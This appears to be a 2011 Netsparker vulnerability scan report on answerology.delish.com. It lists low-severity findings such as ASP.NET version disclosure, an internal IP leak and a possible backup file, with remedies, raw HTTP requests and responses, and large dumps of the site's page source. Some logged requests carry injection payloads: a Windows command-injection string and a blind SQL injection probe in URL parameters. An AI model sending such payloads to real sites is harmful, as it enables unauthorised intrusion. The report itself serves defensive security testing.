src="/cm/shared/ria/swfobject2.1/swfobject.min.js"></script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/flash.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL FUNCTIONS/*@cc_on @*//*@if (@_jscript_version < 5.7)$(document).ready(function(){ $('#global_footer').css('display','none'); $('#global_footer').css('display','block');});/*@end @*/</script><script language="javascript">function refreshAds(){ //Hearst tracking if (top.s) { pageviewTracking(); } //MSN tracking if (top.s_msn) { if ( s_msn.referrer == location.href ) { s_msn.referrer=''; } s_msn.t(); } try { wlAnalytics.TrackPage(); } catch (e) { $.track.trackInfo.userStatic.requestId = null; $.track.trackPage(); } var spans = document.getElementsByTagName('span'); var adDivs = new Array(); for(var i=0;i<spans.length;i++){ if(spans[i].id.indexOf('ams_del') > -1 && spans[i].firstChild){ if(spans[i].firstChild.nodeName == 'DIV'){ adDivs.push(spans[i].firstChild); } } } for(var i=0;i<adDivs.length;i++){ dapMgr.displayAd(dapMgr.getAdItemIndex(adDivs[i].id)); }}</script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/omniture-tags.js"></script><!-- SHARE THIS SCRIPT DONT REMOVE --><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script><!-- //END FO SHARE THIS SCRIPT --><!-- Social --><!--xs_social_metatag_includes.tmpl--><meta property="og:description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=536265605"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=536265605"></script> <script type="text/javascript" src="/cssjs/headers.js?v=536265605"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'home.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=536265605"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- script type="text/javascript"> if (document.location != top.location) { top.location = document.location; } </script --> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> layout.getHeaderBoxAd('homepage');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <div id=&..
ASP.NET Version Disclosure

ASP.NET Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from X-AspNet-Version banner of HTTP response or default ASP.NET error page.

Impact

An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.

Remedy

Apply the following changes on your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses. 
<System.Web>
     < httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- //index.aspx

//index.aspx

http://answerology.delish.com//index.aspx?template=%22%26%20SET%20%2FA%200xFFF9999-2%20%26&widgetNam..

Extracted Version

2.0.50727

Request

GET //index.aspx?template=%22%26%20SET%20%2FA%200xFFF9999-2%20%26&widgetName=delish_rightrail&au=delishmodules&__as_javascript=true HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Location: /index.aspx?template=page_not_found.ascx&error=
Content-Type: text/html; charset=utf-8
Content-Length: 174
Date: Sat, 17 Sep 2011 13:34:28 GMT
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.aspx%3ftemplate%3dpage_not_found.ascx%26error%3d">here</a>.</h2>
</body></html>
[Possible] Internal IP Address Leakage

[Possible] Internal IP Address Leakage
1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.

Classification

PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13
- /index.aspx

/index.aspx

http://answerology.delish.com/index.aspx?template=page_not_found.ascx&error=

Parameters

Parameter Type Value
template GET page_not_found.ascx
error GET

Extracted IP Address(es)

172.20.65.105

Request

GET /index.aspx?template=page_not_found.ascx&error= HTTP/1.1
Referer: http://answerology.delish.com//index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=delish_rightrail&au=delishmodules&__as_javascript=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 72529
Date: Sat, 17 Sep 2011 13:34:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>FAQs: About Answerology.com</title><meta name="title" content="FAQs: About Answerology.com" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.105 9/17/2011 9:34:29 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><link rel="apple-touch-icon" href="/cm/delish/site_images/favicon/apple-touch-icon.png" /><link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/x-icon" /><!-- **** Canonical Meta-tag **** --><link rel="canonical" href="http://www.delish.com/answerology-wrapper/"/><!-- **** RSS **** --><link rel="alternate" type="application/rss+xml" href="http://www.delish.com" /><!-- **** STYLES **** --><!-- MSN Video Player CSS File --><!--<link rel="stylesheet" type="text/css" href="/cm/delish/styles/channels.css"></link>--><link rel="stylesheet" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" /><script type"text/javascript"> /* Set document.domain early for proper ad render */ try { document.domain = 'delish.com'; } catch(ex){}</script><style type="text/css"> /* IE Hover htc */ body { behavior: url('http://games.delish.com/proxy.aspx?url=http://www.delish.com/cm/delish/scripts/csshover3.htc'); }</style><link rel="stylesheet" href="/cm/delish/styles/global.css" type="text/css" /><link rel="stylesheet" href="/cm/delish/styles/header.css" type="text/css" /><!-- **** SCRIPTS **** --><!-- Static Promo: restrict access if subdomain not match category --><!-- End Static Promo --><script src="/cm/shared/scripts/jquery-1.4.2.min.js" language="javascript" type="text/javascript"></script><!-- refresh ads --><!-- quiz includes --><!-- /quiz includes --><script src="/cm/delish/scripts/jquery.tooltip.pack.js" type="text/javascript" language="javascript"></script><script language="javascript" src="/cm/shared/scripts/jqXMLUtils.js"></script><script src="/cm/shared/scripts/jquery.bgiframe.min.js" type="text/javascript"></script><!-- games_wrapper --><script language="javascript" src="/cm/delish/scripts/rf-tmpl-ext.js" type="text/javascript"></script><script language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL CONSTANTSvar articleID = "";var rf_cache_bust = Math.floor(Math.random()*100001);var site_name = "Delish";//Article Source Codevar source_id = "";//Set up the source link type - based on content type//var pageAdsParams = {"sub_cat_prefixes":"","article_type_prefix":null,"site_prefix":"delish","position_list":"ams_delish_1x1,ams_delish_footer,ams_delish_networktout,ams_delish_sponsored_links,ams_delish_top","ad_sub_category_prefix":null,"subdomain":"www","ams_promo":null,"url_name":null,"keywords":null,"browser_path":"/answerology-wrapper/?ignoreCache=1","section_prefix":"answerology-wrapper","ad_category_prefix":null,"cat_prefixes":""};</script><script type="text/javascript" src="/cm/shared/scripts/cookies.js"></script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script><link href="/cm/delish/styles/autocomplete.css" rel="stylesheet" type="text/css"><script src="/cm/delish/scripts/autocomplete_bgiframe_delish.js" type="text/javascript"></script><!--<gTMPL_INCLUDE NAME="xs_script_include_user_session.tmpl">--><!-- TEST script includes xs_script_include_user_session.tmpl DIRECT INSERT--><script>var _ghearst_vars = {};//_ghearst_vars["ams_ads_script_src"] = "";</script><script src="/cm/shared/scripts/get_mag_user_local_v02.js" type="text/javascript" ></script><script>if ($h.session.ha){ $h.util.buildScriptTag("&ha=1"); } else { }</script><!-- Omniture global variable --><script language="javascript">var s_prop49 = '';</script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/login.js"></script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/global.js"></script><!-- search and global js go here --><!-- MSN Video Player Scripts --><script src='/cm/delish/scripts/jquery.simplemodal.js' type='text/javascript'></script><!-- Confirm JS and CSS files for Logout--><script src='/cm/delish/scripts/confirm.js' type='text/javascript'></script><link type='text/css' href='/cm/delish/styles/confirm.css' rel='stylesheet' media='screen' /><!--[if lt IE 7]><link type='text/css' href='/cm/delish/styles/basic_ie.css' rel='stylesheet' media='screen' /><![endif]--><script language="javascript" type="text/javascript" src="/cm/shared/ria/swfobject2.1/swfobject.min.js"></script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/flash.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL FUNCTIONS/*@cc_on @*//*@if (@_jscript_version < 5.7)$(document).ready(function(){ $('#global_footer').css('display','none'); $('#global_footer').css('display','block');});/*@end @*/</script><script language="javascript">function refreshAds(){ //Hearst tracking if (top.s) { pageviewTracking(); } //MSN tracking if (top.s_msn) { if ( s_msn.referrer == location.href ) { s_msn.referrer=''; } s_msn.t(); } try { wlAnalytics.TrackPage(); } catch (e) { $.track.trackInfo.userStatic.requestId = null; $.track.trackPage(); } var spans = document.getElementsByTagName('span'); var adDivs = new Array(); for(var i=0;i<spans.length;i++){ if(spans[i].id.indexOf('ams_del') > -1 && spans[i].firstChild){ if(spans[i].firstChild.nodeName == 'DIV'){ adDivs.push(spans[i].firstChild); } } } for(var i=0;i<adDivs.length;i++){ dapMgr.displayAd(dapMgr.getAdItemIndex(adDivs[i].id)); }}</script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/omniture-tags.js"></script><!-- SHARE THIS SCRIPT DONT REMOVE --><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script><!-- //END FO SHARE THIS SCRIPT --><!-- Social --><!--xs_social_metatag_includes.tmpl--><meta property="og:description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=403838316"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=403838316"></script> <script type="text/javascript" src="/cssjs/headers.js?v=403838316"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'page_not_found.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=403838316"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> layout.getHeaderBoxAd('other');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <div id="msn_header_ad"> <div id="ad_container"> <span id="ams_delish_top"><div id="divID_DLSRD1" name="div_DLSRD1" ..
[Possible] Backup File Found

[Possible] Backup File Found
1 TOTAL
LOW
Netsparker identified a backup file on the web server.

Impact

Backup files can contain old or current versions of a file on the web server. This could include sensitive data such as password files or even the applications source code. This form of issue normally leads to further vulnerabilities or at worse sensitive information disclosure.

Remedy

Do not store backup files on production servers.

Classification

OWASP A7 PCI v1.2-6.5.10 PCI v2.0-6.5.6 CWE-425 CAPEC-87 WASC-34
- /index.aspx.cs

/index.aspx.cs

http://answerology.delish.com/index.aspx.cs

Request

GET /index.aspx.cs HTTP/1.1
Referer: http://answerology.delish.com/index.aspx.cs
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:44:44 GMT
Content-Length: 84
Connection: keep-alive
Cache-Control: private


There has been an error processing your request. Please try again later.
Forbidden Resource

Forbidden Resource
1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /fckeditor/

/fckeditor/ CONFIRMED

http://answerology.delish.com/fckeditor/

Request

GET /fckeditor/ HTTP/1.1
Referer: http://answerology.delish.com/fckeditor/fckeditor.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 13:34:32 GMT
Connection: keep-alive
Vary: Accept-Encoding


<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>
MySQL Database Identified

MySQL Database Identified
1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only. There is no direct impact arising from this issue.
- //index.aspx

//index.aspx CONFIRMED

http://answerology.delish.com//index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=de..

Request

GET //index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=delish_rightrail&au=-delishmodules%27OR%201=1)%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--%20&__as_javascript=true HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
